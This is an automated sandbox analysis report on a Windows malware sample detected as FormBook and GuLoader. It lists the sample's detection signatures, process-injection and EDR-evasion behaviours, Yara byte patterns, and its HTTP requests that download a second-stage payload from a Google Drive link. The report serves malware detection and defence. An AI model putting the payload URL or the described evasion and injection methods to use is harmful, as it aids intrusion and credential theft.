Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PEDIDO-144848.exe

Overview

General Information

Sample name:PEDIDO-144848.exe
Analysis ID:1528317
MD5:0d9f261233df472092fbfbb1e982bbe7
SHA1:003feaf99830b2aac6213ede7d72b148b709da0b
SHA256:57e01b9f47d3220585bdef71852add983d96d959c08b961b1f2795ef07d78160
Infos:

Detection

FormBook, GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • PEDIDO-144848.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\PEDIDO-144848.exe" MD5: 0D9F261233DF472092FBFBB1E982BBE7)
    • PEDIDO-144848.exe (PID: 7228 cmdline: "C:\Users\user\Desktop\PEDIDO-144848.exe" MD5: 0D9F261233DF472092FBFBB1E982BBE7)
      • RAVCpl64.exe (PID: 6432 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • SecEdit.exe (PID: 4508 cmdline: "C:\Windows\SysWOW64\SecEdit.exe" MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • explorer.exe (PID: 4968 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1400f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 3 entries

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-07T19:25:58.193729+020028032702Potentially Bad Traffic192.168.11.2049748142.250.80.46443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: PEDIDO-144848.exeReversingLabs: Detection: 23%
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: PEDIDO-144848.exeJoe Sandbox ML: detected
        Source: PEDIDO-144848.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.97:443 -> 192.168.11.20:49749 version: TLS 1.2
        Source: PEDIDO-144848.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: SecEdit.pdb source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: SecEdit.pdbGCTL source: PEDIDO-144848.exe, 00000002.00000003.115513057373.0000000006BE0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000002.00000003.115463317086.0000000036A24000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115459604949.000000003687C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe
        Source: Binary string: mshtml.pdbUGP source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405642
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004060A4 FindFirstFileA,FindClose,0_2_004060A4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 4x nop then mov ebx, 00000004h2_2_369004DE
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4x nop then mov ebx, 00000004h4_2_02ED04DE
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49748 -> 142.250.80.46:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: PEDIDO-144848.exe, PEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: PEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560493823.0000000006AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU2
        Source: PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU3
        Source: PEDIDO-144848.exe, 00000002.00000002.115560534476.0000000006B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU5v
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: PEDIDO-144848.exe, 00000002.00000003.115461027098.0000000006B6E000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460098433.0000000006B73000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000002.115560757589.0000000006B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1nw_HdIs_98H4IwtUbliFgm1UEpN9uiHU&export=download
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/h
        Source: PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.40.97:443 -> 192.168.11.20:49749 version: TLS 1.2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_004050F7

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C434E0 NtCreateMutant,LdrInitializeThunk,2_2_36C434E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_36C42EB0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_36C42D10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_36C42BC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_36C42B90
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C44570 NtSuspendThread,2_2_36C44570
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C44260 NtSetContextThread,2_2_36C44260
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42EC0 NtQuerySection,2_2_36C42EC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42ED0 NtResumeThread,2_2_36C42ED0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E80 NtCreateProcessEx,2_2_36C42E80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E50 NtCreateSection,2_2_36C42E50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42E00 NtQueueApcThread,2_2_36C42E00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42FB0 NtSetValueKey,2_2_36C42FB0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42F00 NtCreateFile,2_2_36C42F00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42F30 NtOpenDirectoryObject,2_2_36C42F30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42CD0 NtEnumerateKey,2_2_36C42CD0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42CF0 NtDelayExecution,2_2_36C42CF0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C43C90 NtOpenThread,2_2_36C43C90
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C50 NtUnmapViewOfSection,2_2_36C42C50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C10 NtOpenProcess,2_2_36C42C10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C20 NtSetInformationFile,2_2_36C42C20
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C43C30 NtOpenProcessToken,2_2_36C43C30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42C30 NtMapViewOfSection,2_2_36C42C30
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42DC0 NtAdjustPrivilegesToken,2_2_36C42DC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42DA0 NtReadVirtualMemory,2_2_36C42DA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42D50 NtWriteVirtualMemory,2_2_36C42D50
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42AC0 NtEnumerateValueKey,2_2_36C42AC0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42A80 NtClose,2_2_36C42A80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42AA0 NtQueryInformationFile,2_2_36C42AA0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42A10 NtWriteFile,2_2_36C42A10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42BE0 NtQueryVirtualMemory,2_2_36C42BE0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B80 NtCreateKey,2_2_36C42B80
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B00 NtQueryValueKey,2_2_36C42B00
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B10 NtAllocateVirtualMemory,2_2_36C42B10
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42B20 NtQueryInformationProcess,2_2_36C42B20
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C438D0 NtGetContextThread,2_2_36C438D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C429D0 NtWaitForSingleObject,2_2_36C429D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C429F0 NtReadFile,2_2_36C429F0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36913719 NtSuspendThread,2_2_36913719
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36913A39 NtResumeThread,2_2_36913A39
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_369133F9 NtSetContextThread,2_2_369133F9
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A34E0 NtCreateMutant,LdrInitializeThunk,4_2_030A34E0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B00 NtQueryValueKey,LdrInitializeThunk,4_2_030A2B00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030A2B10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B80 NtCreateKey,LdrInitializeThunk,4_2_030A2B80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030A2B90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_030A2BC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2A80 NtClose,LdrInitializeThunk,4_2_030A2A80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A29F0 NtReadFile,LdrInitializeThunk,4_2_030A29F0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2F00 NtCreateFile,LdrInitializeThunk,4_2_030A2F00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E50 NtCreateSection,LdrInitializeThunk,4_2_030A2E50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_030A2D10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C30 NtMapViewOfSection,LdrInitializeThunk,4_2_030A2C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2CF0 NtDelayExecution,LdrInitializeThunk,4_2_030A2CF0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A4260 NtSetContextThread,4_2_030A4260
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A4570 NtSuspendThread,4_2_030A4570
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2B20 NtQueryInformationProcess,4_2_030A2B20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2BE0 NtQueryVirtualMemory,4_2_030A2BE0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2A10 NtWriteFile,4_2_030A2A10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2AA0 NtQueryInformationFile,4_2_030A2AA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2AC0 NtEnumerateValueKey,4_2_030A2AC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A29D0 NtWaitForSingleObject,4_2_030A29D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A38D0 NtGetContextThread,4_2_030A38D0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2F30 NtOpenDirectoryObject,4_2_030A2F30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2FB0 NtSetValueKey,4_2_030A2FB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E00 NtQueueApcThread,4_2_030A2E00
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2E80 NtCreateProcessEx,4_2_030A2E80
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2EB0 NtProtectVirtualMemory,4_2_030A2EB0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2EC0 NtQuerySection,4_2_030A2EC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2ED0 NtResumeThread,4_2_030A2ED0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2D50 NtWriteVirtualMemory,4_2_030A2D50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2DA0 NtReadVirtualMemory,4_2_030A2DA0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2DC0 NtAdjustPrivilegesToken,4_2_030A2DC0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C10 NtOpenProcess,4_2_030A2C10
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C20 NtSetInformationFile,4_2_030A2C20
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A3C30 NtOpenProcessToken,4_2_030A3C30
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2C50 NtUnmapViewOfSection,4_2_030A2C50
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A3C90 NtOpenThread,4_2_030A3C90
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_030A2CD0 NtEnumerateKey,4_2_030A2CD0
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EDEEBA NtQueryInformationProcess,4_2_02EDEEBA
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3A48 NtResumeThread,4_2_02EE3A48
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3728 NtSuspendThread,4_2_02EE3728
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3408 NtSetContextThread,4_2_02EE3408
        Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 4_2_02EE3D68 NtQueueApcThread,4_2_02EE3D68
